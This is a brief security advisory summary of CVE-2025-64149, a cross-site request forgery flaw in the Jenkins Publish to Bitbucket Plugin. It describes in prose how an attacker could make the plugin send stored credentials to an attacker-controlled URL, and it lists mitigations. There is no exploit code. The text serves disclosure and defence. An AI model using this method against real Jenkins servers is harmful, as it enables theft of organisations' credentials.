CVE-2025-64149

A cross-site request forgery (CSRF) vulnerability exists in the Jenkins Publish to Bitbucket Plugin versions 0.4 and earlier. The plugin fails to require POST requests or implement CSRF protection tokens for certain endpoints, allowing an attacker to forge a request that causes the plugin to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method [1][3].

To exploit this vulnerability, an attacker must first obtain a valid credentials ID stored in Jenkins (e.g., via a separate information disclosure flaw) and then trick a Jenkins user with sufficient permissions into clicking a crafted link or submitting a malicious form. The plugin will then send the associated credentials to the attacker-controlled URL, effectively capturing them [2][3].

The impact is severe: an attacker can steal credentials stored in Jenkins, potentially gaining access to other systems and services that those credentials protect. This could lead to further compromise within the organization's infrastructure [1][2].

As of the advisory publication on October 29, 2025, the vulnerability remains unpatched; no fixed version of the plugin has been released. Users are advised to disable the plugin if not essential, monitor for updates from Jenkins, and apply workarounds such as restricting access to the plugin's functionality or using Jenkins' built-in CSRF protection mechanisms [1][2].